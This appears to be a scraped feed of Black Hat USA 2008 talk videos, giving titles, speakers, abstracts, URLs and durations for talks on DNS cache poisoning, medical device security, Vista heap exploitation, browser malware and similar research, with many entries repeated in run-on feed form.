Since its inception, the Deobfuscator has proven to reduce analysis tasks that previously took days into ones that take mere minutes. 00:16:29 Black Hat, Eric Laspe,Deobfuscator,Code Obfuscation feedback@blackhat.com no Black Hat USA 2008: Zane Lackey and Luis Miras - Mobile Phone Messaging Anti-Forensics With the increased use of SMS, performing forensics on seized mobile phones to retrieve text and multimedia messages is rapidly becoming a critical investigative requirement. As with other areas of forensics, the mobile phone forensics toolkits available today are not perfect. This talk will seek to inform the audience of various attacks we have discovered against mobile phone forensics software that allow attackers to avoid detection. Additionally, during this talk we will release and demonstrate a tool for sending and receiving covert SMS messages. Finally, we will release SMS fuzzing tools to allow vendors and users of mobile phone forensics software to test the reliability of the tools they rely upon. http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Lackey feedback@blackhat.com Computer D7B0DA0C-B929-44F4-89DC-B2B4F05AEAF5-51585-0003185DA0B9EE71-FFA Mon, 16 Mar 2009 16:37:17 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Lackey/black-hat-usa-08-lackey-mobilephoneantiforensics-hires.m4v Black Hat USA 2008: Zane Lackey and Luis Miras - Mobile Phone Messaging Anti-Forensics With the increased use of SMS, performing forensics on seized mobile phones to retrieve text and multimedia messages is rapidly becoming a critical investigative requirement. As with other areas of forensics, the mobile phone forensics toolkits available today are not perfect. This talk will seek to inform the audience of various attacks we have discovered against mobile phone forensics software that allow attackers to avoid detection. Additionally, during this talk we will release and demonstrate a tool for sending and receiving covert SMS messages. 
Finally, we will release SMS fuzzing tools to allow vendors and users of mobile phone forensics software to test the reliability of the tools they rely upon. 00:16:27 Black Hatk,Zane Lackey,Luis Miras,Mobile Phone Messaging, Anti-Forensics feedback@blackhat.com no Black Hat USA 2008: Itzik Kotler, jonathan Rom - Jinx - Malware 2.0 Browsers nowadays are competing with operating systems as the next application development platform. The rapid development of Web 2.0 keeps pushing browser developers into implementing advanced features that allow the creation of interactive multimedia applications. This sets the grounds for a new fertile environment in which a new breed of malware can come to life. Malware that is OS and architecture independent, as covert as a cutting edge rootkit but at the same time implemented through a series of API's and a generous variety of high-level OOP languages simplifying the task. http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Kotler feedback@blackhat.com Computer AD319588-6F59-4A8A-A0E7-CE862906F010-51585-000313A005E835C8-FFA Mon, 16 Mar 2009 16:30:58 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Kotler/black-hat-usa-08-kotler-jinx-hires.m4v Black Hat USA 2008: Itzik Kotler, jonathan Rom - Jinx - Malware 2.0 Browsers nowadays are competing with operating systems as the next application development platform. The rapid development of Web 2.0 keeps pushing browser developers into implementing advanced features that allow the creation of interactive multimedia applications. This sets the grounds for a new fertile environment in which a new breed of malware can come to life. Malware that is OS and architecture independent, as covert as a cutting edge rootkit but at the same time implemented through a series of API's and a generous variety of high-level OOP languages simplifying the task. 
Black Hat USA 2008: Tadayoshi Kohno, Kevin Fu - New Classes of Security and Privacy Vulnerabilities for Implantable Wireless Medical Devices
Medical devices are becoming more sophisticated and wireless. We recently published an academic paper titled "Pacemakers and Implantable Cardiac Defibrillators: Software Radio Attacks and Zero-Power Defenses." In this paper we describe experiments with a real, common implantable defibrillator and show that risks are real, albeit small today. Using our own equipment, we are able to extract private information stored on the implantable defibrillator, change its settings, and even make it issue an electric shock. (We stress that patients should not be concerned about our current results, but that the community should demand stronger security mechanisms in future devices.)

Previously one of us (KF) made international news by exposing vulnerabilities in RFID credit cards, and the other of us (TK) was the first to publicly study the security of the Diebold electronic voting machine (in 2003). We've now turned our attention to implantable medical devices because we think that security will become increasingly important in the near future. Second, implantable medical device security is exactly the right tool to talk about how the security community will evolve -- it's no longer just about PCs and network security -- small embedded systems are now life critical.

Come to this talk and learn about the directions of implantable medical devices, the security and privacy risks that we have experimentally discovered, and our predictions for the field. And, as a bonus, learn what drives the academic security research community and why, collectively, we've dedicated our time to studying e-voting, credit cards, and implantable medical devices, and what we think the community might turn to next. And learn some principles that will help your future systems -- whether embedded, or medical, or not -- be more secure from the start.
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Kohno
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Kohno/black-hat-usa-08-kohno-wirelessmedicaldevices-hires.m4v
Duration: 1:13:53
Keywords: Black Hat, Tadayoshi Kohno, Kevin Fu, Wireless Medical Devices
Posted: Mon, 16 Mar 2009 14:34:05 -0700

Black Hat USA 2008: Su Yong Kim - Vista and ActiveX Controls
This presentation will address the differences in ActiveX control vulnerabilities between Vista and XP. Internet Explorer is more secure on Vista due to UAC (User Account Control) and protected mode. However, ActiveX control vulnerabilities on Vista have nearly the same effect as those on XP. The reason for this is that ActiveX controls for Vista have been developed with a focus on compatibility, not security. On Vista, additional techniques are needed to successfully exploit file/registry write, process execution, and buffer overflow vulnerabilities. In this presentation, these techniques will be addressed in detail.

There is a common mistake that developers are liable to make with Vista. Developers sometimes install program files in low integrity folders, because they wish to update them silently. However, program files with low integrity can be overwritten easily by malicious users. I developed a tool to identify this problem.

There are two ways developers elevate the privilege of an ActiveX control: explicit or implicit. Implicit privilege elevation is more dangerous, because it does not require a user agreement. Implicit privilege elevation does not elevate the privilege of the ActiveX control itself but uses another higher-privileged surrogate process. If privilege-elevated ActiveX controls have a critical vulnerability, malicious users can obtain higher privilege by exploiting this vulnerability. Therefore, the developer should not overuse implicit privilege elevation when writing a secure ActiveX control. Analysts should take the implicit privilege elevation of ActiveX controls into consideration when they inspect ActiveX controls on Vista.
Speaker page: https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Kim
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Kim/black-hat-usa-08-kim-vista-activexcontrol-hires.m4v
Duration: 17:31
Keywords: Black Hat, Su Yong Kim, Vista, ActiveX
Posted: Mon, 16 Mar 2009 00:54:33 -0700

Black Hat USA 2008: Dan Kaminsky - Black Ops 2008 -- Its The End Of The Cache As We Know It
DNS is at the heart of every network -- when a web site is browsed to, it says where the site is, and when an email is sent, DNS says where to. The answer is usually correct -- but not always. Six months ago, it became clear that there was an ancient design flaw, present in the original 1983 specification for DNS, that would allow any attacker to insert their own addresses for DNS names. An industry wide bug hunt commenced, culminating in a simultaneous release date of patches for virtually all platforms. We will talk about the issue, and about how a partnership between industry competitors and researchers helped protect all our customers.
Speaker page: https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Kaminsky
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Kaminsky/black-hat-usa-08-kaminsky-blackops08-hires.m4v
Duration: 1:20:35
Keywords: Black Hat, Dan Kaminsky, DNS, protocol, vulnerability
Posted: Mon, 16 Mar 2009 00:50:23 -0700

Black Hat USA 2008: Alex Ionescu - Pointers and Handles, A Story Of Unchecked Assumptions In The Windows Kernel
This presentation will discuss several vulnerabilities in Win32k.sys, the Windows NT kernel-mode library responsible for the Windows GUI Subsystem, ranging from privileged-path denial-of-service attacks due to bad assumptions regarding the validity of pointers before they are dereferenced, to the more dangerous unprivileged attacks, which leave any Windows NT-based operating system vulnerable to a local denial-of-service attack from a user with logon privileges (including a guest account).

First, a couple of unchecked pointer dereferences will be exposed, caused by a typical programming bug of assuming the occurrence of a certain initialization stage, which may not actually have occurred (either by design, or due to timing). These kinds of bugs are amplified when the code makes assumptions due to the undocumented nature of the interface, and uses this assumption in lieu of pointer validation.

The second programming error that will be exposed is a combination of incorrect trust of user-mode accessible handles, especially non-privileged access, and incorrect usage of Nt versus Zw APIs when dealing with user-mode data. The kernel mechanism of "protect from close" handles will be explained, as well as how it can be used to attack Win32k.sys.

This second part will be the most focused part of the presentation, since it is a pretty new kind of vulnerability that has been overlooked until now, mostly because it typically only allows DoS or information leaks -- in today's Terminal Services/Multi-User world however, it simply cannot continue to be ignored.
Speaker page: https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Ionescu
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Ionescu/black-hat-usa-08-ionescu-pointersandhandles-hires.m4v
Duration: 42:25
Keywords: Black Hat, Alex Ionescu, Windows Kernel
Posted: Mon, 16 Mar 2009 00:43:59 -0700

Black Hat USA 2008: Chet Hosmer - Metamorphic / Polymorphic Malware DNA
Malware impacts on digital investigations go far beyond the Trojan horse defense as the proliferation of stealthy polymorphic and metamorphic malware continues to evolve. Digital investigators must understand the subtle nuances of sophisticated threats in order to solve sophisticated digital crimes. Traditional forensic investigation methods fall short in providing investigators vital information regarding the signature, behavior, remnants or characteristics of metamorphic/polymorphic malware.

This presentation and accompanying paper quantify the impact of polymorphic and metamorphic threats on the digital investigator and explore non-traditional approaches to investigation. The paper provides a DNA Taxonomy approach for examining and discovering characteristics (live and postmortem) exhibited by these advanced threats.
Speaker page: https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Hosmer
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Hosmer/black-hat-usa-08-hosmer-malware-hires.m4v
Duration: 16:52
Keywords: Black Hat, Chet Hosmer, Metamorphic / Polymorphic Malware DNA
Posted: Mon, 16 Mar 2009 00:41:32 -0700
Black Hat USA 2008: Oded Horovitz - Virtually Secure
Virtualization is a disruptive technology in the data-center which opens the path for new solutions for old problems.

Specifically, virtualization allows the isolation of a particular workload (an application within a VM) from the underlying hardware, and enables the creation of software services which can run independent of the original workload.

The presentation will focus on the capabilities of the security application as services of the hypervisor, how these new services compare with existing security agents which run inside virtual machines, and what the possible future of workload security in a virtual data-center is.
Speaker page: https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Horovitz
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Horovitz/black-hat-usa-08-horovitz-virtuallysecure-hires.m4v
Duration: 49:06
Keywords: Black Hat, Oded Horovitz, Virtualization, VM
Posted: Mon, 16 Mar 2009 00:40:27 -0700

Black Hat USA 2008: Brian Holyfield - Protecting Vulnerable Applications with IIS7
With the advent of IIS7 and its modular design, Microsoft has provided the ability to easily integrate custom ASP.NET HttpModules into the IIS7 request-handling pipeline. This session will present an IIS7 module designed to leverage this architecture to actively and dynamically protect web applications from attack. With minimal configuration, the module can be used to protect virtually any application running on the web server, including non-ASP.NET applications (such as those written in PHP, Cold Fusion, or classic ASP).

This presentation will outline the overall design and architecture of the module, including a detailed explanation of available features and attack defense techniques. The session will focus on live demonstrations of how the module can easily be installed to protect already-deployed applications and how it can block both traditional web application attacks, such as SQL injection and Cross-Site Scripting, and application-specific vulnerabilities like parameter manipulation and authorization attacks.

Following this presentation, the module will be available for free download and use.
Speaker page: https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Holyfield
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Holyfield/black-hat-usa-08-holyfield-protectingwithIIS7-hires.m4v
Duration: 22:43
Keywords: Black Hat, Brian Holyfield, IIS7
Posted: Mon, 16 Mar 2009 00:30:13 -0700

Black Hat USA 2008: Billy Hoffman - Circumventing Automated JavaScript Analysis Tools
JavaScript is fast becoming the vehicle of choice for malware authors. Over the last 3 years we've seen how attackers can use vanilla JavaScript to create powerful payloads such as intranet port scanning and hijacking, information theft, and even full web security assessments and SQL injection attacks. Even traditional browser or operating system attacks are being delivered to victims through the browser encased inside a JavaScript packed IFrame. Obfuscated JavaScript payloads are the norm thanks to malware frameworks like MPACK. With so many security threats being launched through JavaScript it is crucial to explore the capabilities of the tools researchers have to analyze malicious JavaScript as well as countermeasures that can be taken against them.

In this presentation we will explore the tit-for-tat battle between malicious JavaScript authors and security researchers. We will look at the current tricks and techniques used to protect malicious JavaScript from analysis, such as dynamic encoding (JS/Wonka), deliberate tool breaks (, etc), unmodifiable functions, and network nonce. We will see how researcher tools such as CaffeineMonkey and Decrypt JS attempt to defeat these current tricks and analyze basic obfuscated JavaScript.

Next we explore multiple new techniques to circumvent the current generation of automated analysis tools by detecting their presence from inside malicious JavaScript. (JSPill? hmmmm) These methods include HTTP/browser fingerprinting, DOM testing and encrypting, Domain and Network testing, Execution environment testing, and cross plugin communication testing. We will demonstrate malicious JavaScript detecting analysis tools using these methods and refusing to give up its secrets until it's running in the web browser of choice. We'll demonstrate encrypting JavaScript to only run in particular browsers or environments. We'll also demonstrate a couple other tricks, such as encoding malicious JavaScript as nothing but white space, and function clobbering for fun and profit.

Finally we discuss countermeasures to the countermeasures, and offer feature ideas and advice for researchers developing the 3rd generation of automated JavaScript analysis tools.
Speaker page: https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Hoffman
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Hoffman/black-hat-usa-08-hoffman-automatedJSanalysis-hires.m4v
Duration: 1:11:04
Keywords: Black Hat, Billy Hoffman, Automated JavaScript, Reverse Engineering
Posted: Mon, 16 Mar 2009 00:27:20 -0700
1:11:04 Black hat, Billy Hoffman, Automated javascript, Reverse Engineering feedback@blackhat.com no Black Hat USA 2008: Christofer Hoff - The Four Horsemen of the Virtualization Security Apocalypse Despite shiny new stickers on the boxes of our favorite security vendors' products that advertise "virtualization ready!" or the hordes of new startups emerging from stealth decrying the second coming of security, there exists the gritty failed reality of attempting to replicate complex network and security topologies in virtualized environments.<br /> <br /> This talk will clearly demonstrate that unless we radically rethink our approach, the virtualization security apocalypse is nigh!<br /> <br /> This talk will focus on both securing virtualization as well as virtualizing security; from virtualization-enabled chipsets to the hypervisor to the VM's, we'll explore the real issues that exist today as well as those that are coming that aren't being discussed or planned for. https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Hoff feedback@blackhat.com Computer EA29314D-9451-4FBC-8D4B-201164914865-22589-0002E3708EB37B97-FFA Mon, 16 Mar 2009 00:24:21 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Hoff/black-hat-usa-08-hoff-fourhorsemen-hires.m4v Black Hat USA 2008: Christofer Hoff - The Four Horsemen of the Virtualization Security Apocalypse Despite shiny new stickers on the boxes of our favorite security vendors' products that advertise "virtualization ready!" or the hordes of new startups emerging from stealth decrying the second coming of security, there exists the gritty failed reality of attempting to replicate complex network and security topologies in virtualized environments. This talk will clearly demonstrate that unless we radically rethink our approach, the virtualization security apocalypse is nigh! 
This talk will focus on both securing virtualization as well as virtualizing security; from virtualization-enabled chipsets to the hypervisor to the VM's, we'll explore the real issues that exist today as well as those that are coming that aren't being discussed or planned for. 58:53 Black Hat, Christofer Hoff, Virtualization feedback@blackhat.com no Black Hat USA 2008: Ben Hawkes - Attacking the Vista Heap This presentation explores the cutting edge of heap exploitation theory and practice on Windows Vista. The focus is on finding previously unknown attack vectors resulting from memory corruption on the heap. These include techniques for controlling execution flow by attacking only the heap implementation and not the application itself, and techniques for attacking the application in conjunction with the heap. Additionally, several design changes to further improve the security of the Vista heap will be suggested.<br /> <br /> The heap is the userland component in charge of dynamic memory management. It is present and used to some extent in every Windows Vista process. Memory corruption on the heap (heap overflow) is common, seen in nearly every application and making up a large portion of reported vulnerabilities. With Windows Vista, Microsoft introduced several security features to the heap, effectively hardening it from classic heap overflow exploit techniques. https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Hawkes feedback@blackhat.com Computer 714C8AE6-EA06-4EC2-80BE-9A09F54D82FE-22589-0002E32FE1B31369-FFA Mon, 16 Mar 2009 00:20:04 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Hawkes/black-hat-usa-08-hawkes-vistaheap-hires.m4v Black Hat USA 2008: Ben Hawkes - Attacking the Vista Heap This presentation explores the cutting edge of heap exploitation theory and practice on Windows Vista. The focus is on finding previously unknown attack vectors resulting from memory corruption on the heap. 
These include techniques for controlling execution flow by attacking only the heap implementation and not the application itself, and techniques for attacking the application in conjunction with the heap. Additionally, several design changes to further improve the security of the Vista heap will be suggested. The heap is the userland component in charge of dynamic memory management. It is present and used to some extent in every Windows Vista process. Memory corruption on the heap (heap overflow) is common, seen in nearly every application and making up a large portion of reported vulnerabilities. With Windows Vista, Microsoft introduced several security features to the heap, effectively hardening it from classic heap overflow exploit techniques. 1:12:04 Black Hat, Ben Hawkes,Vista Heap, Exploits feedback@blackhat.com no Black Hat USA 2008: Shanit Gupta - Got Citrix, Hack It! Citrix is a widely used remote desktop application utilized in many major corporations around the world. In addition to offering the typical benefits of RDP and Microsoft terminal services, it is capable of sandboxing and restricting the applications that can be executed by the user. Unfortunately, often times the Citrix environment can introduce a false sense of security within organizations. There are several ways to circumvent security controls within the Citrix framework and many system administrators are not aware of these attacks. During this presentation, we’ll demonstrate ways in which to compromise the Citrix environment using multiple attack vectors. Then we’ll show you the corresponding remediation strategies. https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Gupta feedback@blackhat.com Computer 2314F64A-22E1-4728-8357-876F58FA174E-22589-0002E2FF68AE640F-FFA Mon, 16 Mar 2009 00:16:18 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Gupta/black-hat-usa-08-gupta-gotcitrix-hires.m4v Black Hat USA 2008: Shanit Gupta - Got Citrix, Hack It! 
Citrix is a widely used remote desktop application utilized in many major corporations around the world. In addition to offering the typical benefits of RDP and Microsoft terminal services, it is capable of sandboxing and restricting the applications that can be executed by the user. Unfortunately, often times the Citrix environment can introduce a false sense of security within organizations. There are several ways to circumvent security controls within the Citrix framework and many system administrators are not aware of these attacks. During this presentation, we’ll demonstrate ways in which to compromise the Citrix environment using multiple attack vectors. Then we’ll show you the corresponding remediation strategies. 13:43 Black Hat, Shanit Gupta, Citrix, RDP feedback@blackhat.com no Black Hat USA 2008: Ilfak Guilfanov - Decompilers and Beyond <br /> Disassemblers are routinely used for reverse engineering but their inherent limitations make them ineffective for modern large applications. In order to cope with the volume and complexity, we have to switch to the next level of binary code analysis: decompilation.<br /> <br /> In this presentation we will discuss the process of decompiler construction, the encountered problems and solutions. Our slides will show the decompilation process step by step.<br /> <br /> Decompilers open the way to new tools and analysis methods - we will also briefly have a discussion on them. https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Guilfanov feedback@blackhat.com Computer 74909581-9367-4D1B-8DE8-C3672A0F468D-22589-0002E2D3E6DA4546-FFA Mon, 16 Mar 2009 00:13:04 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Guilfanov/black-hat-usa-08-guilfanov-decompilers-hires.m4v Black Hat USA 2008: Ilfak Guilfanov - Decompilers and Beyond Disassemblers are routinely used for reverse engineering but their inherent limitations make them ineffective for modern large applications. 
In order to cope with the volume and complexity, we have to switch to the next level of binary code analysis: decompilation. In this presentation we will discuss the process of decompiler construction, the encountered problems and solutions. Our slides will show the decompilation process step by step. Decompilers open the way to new tools and analysis methods - we will also briefly have a discussion on them. 1:10:08 Black Hat,Ilfak Guilfanov ,Decompilers feedback@blackhat.com no Black Hat USA 2008: Lukas Grunwald - Hacking and Injecting Federal Trojans part 2 Remote Forensic Software or "offensive security" is the new trend in law enforcement and the fight against terrorism.<br /> <br /> The topic is known in Germany as "Federal Trojan". This talk will give an introduction to the needs and problems with classic lawful interception and new remote methods. The problem of poisoning of evidence after a "Trojan" attack from law enforcement, as well as new attack vectors for bad guys are discussed.<br /> <br /> This talk will give a demonstration of an "infection proxy" which shows how to inject malware on the fly while downloading some software, how to bypass commercial security solutions like virii-scanner and anti-malware tools, and how effective Trojan attacks could be if your ISP is helping law enforcement. Methods for anti-remote-forensics are handled as well. Methods of detection of infection proxies and other lawful interception methods are shown. 
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Grunwald feedback@blackhat.com Computer 09427426-0B7C-421D-BC89-D92C566DBCF0-22589-0002E2AA9E845055-FFA Mon, 16 Mar 2009 00:10:01 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Grunwald/black-hat-usa-08-grunwald-federaltrojans1-hires.m4vhttps://media.blackhat.com/bh-usa-08/video/bh-us-08-Grunwald/black-hat-usa-08-grunwald-federaltrojans2-hires.m4v Black Hat USA 2008: Lukas Grunwald - Hacking and Injecting Federal Trojans part 2 Remote Forensic Software or "offensive security" is the new trend in law enforcement and the fight against terrorism. The topic is known in Germany as "Federal Trojan". This talk will give an introduction to the needs and problems with classic lawful interception and new remote methods. The problem of poisoning of evidence after a "Trojan" attack from law enforcement, as well as new attack vectors for bad guys are discussed. This talk will give a demonstration of an "infection proxy" which shows how to inject malware on the fly while downloading some software, how to bypass commercial security solutions like virii-scanner and anti-malware tools, and how effective Trojan attacks could be if your ISP is helping law enforcement. Methods for anti-remote-forensics are handled as well. Methods of detection of infection proxies and other lawful interception methods are shown. 18:15 Black Hat, Lukas Grunwald, Trojans feedback@blackhat.com no Black Hat USA 2008: Lukas Grunwald - Hacking and Injecting Federal Trojans part 1 Remote Forensic Software or "offensive security" is the new trend in law enforcement and the fight against terrorism.<br /> <br /> The topic is known in Germany as "Federal Trojan". This talk will give an introduction to the needs and problems with classic lawful interception and new remote methods. 
The problem of poisoning of evidence after a "Trojan" attack from law enforcement, as well as new attack vectors for bad guys are discussed.<br /> <br /> This talk will give a demonstration of an "infection proxy" which shows how to inject malware on the fly while downloading some software, how to bypass commercial security solutions like virii-scanner and anti-malware tools, and how effective Trojan attacks could be if your ISP is helping law enforcement. Methods for anti-remote-forensics are handled as well. Methods of detection of infection proxies and other lawful interception methods are shown. https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Grunwald feedback@blackhat.com Computer AAF398E6-B52F-49FB-AF8D-7440801D6FDD-22589-0002E2728CE047A5-FFA Mon, 16 Mar 2009 00:07:14 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Grunwald/black-hat-usa-08-grunwald-federaltrojans1-hires.m4v Black Hat USA 2008: Lukas Grunwald - Hacking and Injecting Federal Trojans part 1 Remote Forensic Software or "offensive security" is the new trend in law enforcement and the fight against terrorism. The topic is known in Germany as "Federal Trojan". This talk will give an introduction to the needs and problems with classic lawful interception and new remote methods. The problem of poisoning of evidence after a "Trojan" attack from law enforcement, as well as new attack vectors for bad guys are discussed. This talk will give a demonstration of an "infection proxy" which shows how to inject malware on the fly while downloading some software, how to bypass commercial security solutions like virii-scanner and anti-malware tools, and how effective Trojan attacks could be if your ISP is helping law enforcement. Methods for anti-remote-forensics are handled as well. Methods of detection of infection proxies and other lawful interception methods are shown. 
1:06:23 Black Hat, Lukas Grunwald, Trojans feedback@blackhat.com no Black Hat USA 2008: Jeremiah Grossman, Trey Ford - Get Rich or Die Trying - "Making Money on The Web, The Black Hat Way" Forget Cross-Site Scripting. Forget SQL Injection. If you want to make some serious cash on the Web silently and surreptitiously, you don’t need them. You also don’t need noisy scanners, sophisticated proxies, 0-days, or ninja level reverse engineering skills -- all you need is a Web browser, a clue on what to look for, and a few black hat tricks. Generating affiliate advertising revenue from the Website traffic of others, trade stock using corporation information passively gleaned, inhibit the online purchase of sought after items creating artificial scarcity, and so much more. Activities not technically illegal, only violating terms of service.<br /> <br /> You may have heard these referred to as business logic flaws, but that name really doesn’t do them justice. It sounds so academic and benign in that context when the truth is anything but. These are not the same ol’ Web hacker attack techniques everyone is familiar with, but the one staring you in the face and missed because gaming a system and making money this way couldn’t be that simple. Plus IDS can’t detect them and Web application firewalls can’t black them. If fact, these types of attacks are so hard to detect (if anyone is actually trying) we aren’t even sure how widespread their use actually is. Time to pull back the cover and expose what’s possible. https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Grossman feedback@blackhat.com Computer 3A2AC65F-CD59-46F2-94F2-BB93A9A82E9C-22589-0002E2332E214B73-FFA Mon, 16 Mar 2009 00:03:10 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Grossman/black-hat-usa-08-grossman-getrich-hires.m4v Black Hat USA 2008: Jeremiah Grossman, Trey Ford - Get Rich or Die Trying - "Making Money on The Web, The Black Hat Way" Forget Cross-Site Scripting. 
Forget SQL Injection. If you want to make some serious cash on the Web silently and surreptitiously, you don’t need them. You also don’t need noisy scanners, sophisticated proxies, 0-days, or ninja level reverse engineering skills -- all you need is a Web browser, a clue on what to look for, and a few black hat tricks. Generating affiliate advertising revenue from the Website traffic of others, trade stock using corporation information passively gleaned, inhibit the online purchase of sought after items creating artificial scarcity, and so much more. Activities not technically illegal, only violating terms of service. You may have heard these referred to as business logic flaws, but that name really doesn’t do them justice. It sounds so academic and benign in that context when the truth is anything but. These are not the same ol’ Web hacker attack techniques everyone is familiar with, but the one staring you in the face and missed because gaming a system and making money this way couldn’t be that simple. Plus IDS can’t detect them and Web application firewalls can’t black them. If fact, these types of attacks are so hard to detect (if anyone is actually trying) we aren’t even sure how widespread their use actually is. Time to pull back the cover and expose what’s possible. 55:18 Black Hat, Jeremiah Grossman, Trey Ford, Malware, Business Logic feedback@blackhat.com no Black Hat USA 2008: Travis Goodspeed - Side-channel Timing Attacks on MSP430 Microcontroller Firmware The Texas Instruments MSP430 low-power microcontroller is used in many medical, industrial, and consumer devices. It may be programmed by JTAG, Spy-Bi-Wire, or a serial BootStrap Loader (BSL) which resides in masked ROM.<br /> <br /> By design, JTAG may be disabled by blowing a fuse. The BSL may be disabled by setting a value in flash memory. When enabled, the BSL is protected by a 32-byte password. 
If these access controls are circumvented, a device's firmware may be extracted or replaced.<br /> <br /> After a thorough introduction, this talk will discuss in excruciating detail the results of an effort to reverse engineer the BSL code. Once the BSL's function has been covered, a timing attack will be discussed which might be used to guess the password without brute force under certain conditions. https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Goodspeed feedback@blackhat.com Computer C34AEEBC-0A39-4ABB-8C88-B41BE8775714-22589-0002E1FE7F0A542E-FFA Sun, 15 Mar 2009 23:58:34 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Goodspeed/black-hat-usa-08-goodspeed-sidechannel-hires.m4v Black Hat USA 2008: Travis Goodspeed - Side-channel Timing Attacks on MSP430 Microcontroller Firmware The Texas Instruments MSP430 low-power microcontroller is used in many medical, industrial, and consumer devices. It may be programmed by JTAG, Spy-Bi-Wire, or a serial BootStrap Loader (BSL) which resides in masked ROM. By design, JTAG may be disabled by blowing a fuse. The BSL may be disabled by setting a value in flash memory. When enabled, the BSL is protected by a 32-byte password. If these access controls are circumvented, a device's firmware may be extracted or replaced. After a thorough introduction, this talk will discuss in excruciating detail the results of an effort to reverse engineer the BSL code. Once the BSL's function has been covered, a timing attack will be discussed which might be used to guess the password without brute force under certain conditions. 42:37 Black Hat, Travis Goodspeed, Side-channel, Timing Attacks, Microcontrollers feedback@blackhat.com no Black Hat USA 2008: Tal Garfinkel - Taking the Hype Out of Hypervisors The adoption of virtual machine technology is one of the most dramatic changes to enterprise computing in the last decade, unsurprisingly these changes have substantial implications for system security. 
Unfortunately, much of the current debate around virtual machine security focuses on issues that are either intractable, such as the probability of virtual machine escapes failures, trivial, such as discrepancies between current virtual and real network gear, or red herrings, such as virtual machine based rootkits.<br /> <br /> This talk offers an antidote for the current state of affairs. To begin, I help put these previous points of debate into perspective. Next, I move on to explore more fundamental changes brought on by the move to virtualization such as rapid scaling and increased diversity, increased mobility, loss of machine identity and problems of accountability, discrepancies between real and virtual time, and how these changes have created new operational challenges as well as posing difficulties for existing security architectures. Finally, I discuss what virtual infrastructure vendors and security technology developers need to do to cope with these challenges. https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Garfinkel feedback@blackhat.com Computer 5F11D872-394C-4820-A51A-A11F76F59934-22589-0002DE6E777A0EB8-FFA Sun, 15 Mar 2009 22:53:49 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Garfinkel/black-hat-usa-08-garfinkel-hypervisor-hires.m4v Black Hat USA 2008: Tal Garfinkel - Taking the Hype Out of Hypervisors The adoption of virtual machine technology is one of the most dramatic changes to enterprise computing in the last decade, unsurprisingly these changes have substantial implications for system security. Unfortunately, much of the current debate around virtual machine security focuses on issues that are either intractable, such as the probability of virtual machine escapes failures, trivial, such as discrepancies between current virtual and real network gear, or red herrings, such as virtual machine based rootkits. This talk offers an antidote for the current state of affairs. 
To begin, I help put these previous points of debate into perspective. Next, I move on to explore more fundamental changes brought on by the move to virtualization such as rapid scaling and increased diversity, increased mobility, loss of machine identity and problems of accountability, discrepancies between real and virtual time, and how these changes have created new operational challenges as well as posing difficulties for existing security architectures. Finally, I discuss what virtual infrastructure vendors and security technology developers need to do to cope with these challenges. 55:34 Black Hat, Tal Garfinkel, Virtualization, Hypervisors feedback@blackhat.com no Black Hat USA 2008: Oliver Friedrichs - Threats to the 2008 Presidential Election (and more)
While we first saw the Internet used extensively during the 2004 Presidential election, its use in future presidential elections will clearly overshadow it. This session focuses on the 2008 presidential election in order to demonstrate the risks involved; however, our findings may just as well apply to any future election. It is important to understand the associated risks as political candidates increasingly turn to the Internet to more effectively communicate their positions, rally supporters, and seek to sway critics. These risks include, among others, the dissemination of misinformation, fraud, phishing, malicious code, and the invasion of privacy. Some of these attacks, including those involving the diversion of online campaign donations, have the potential to threaten voters' faith in our electoral system.

We will show that many of the same risks that we have grown accustomed to on the Internet can also manifest themselves when applied to the election process. A number of past studies have discussed a broad spectrum of election fraud such as the casting of fraudulent votes and the security, risks, and challenges of electronic voting. Our discussion will focus exclusively on Internet-borne threats, and how they have the potential to impact the election process leading up to voting day.

We will discuss domain name abuse, including typo squatting and domain speculation as it relates to candidate Internet domains. We will present and demonstrate how widespread this activity has already become.

Secondly, we will discuss the potential impact of phishing on an election.

Thirdly, we will discuss the impact of security risks and malicious code, and the potential for misinformation that may present itself using any of these vectors. This set of risks crosses technical, social, and psychological boundaries. While traditional forms of malicious code certainly play an important role, social engineering and deception provide equal potential and have a more ominous psychological impact on voters who are exercising their right to elect their next president, or cast their vote in any other type of election.

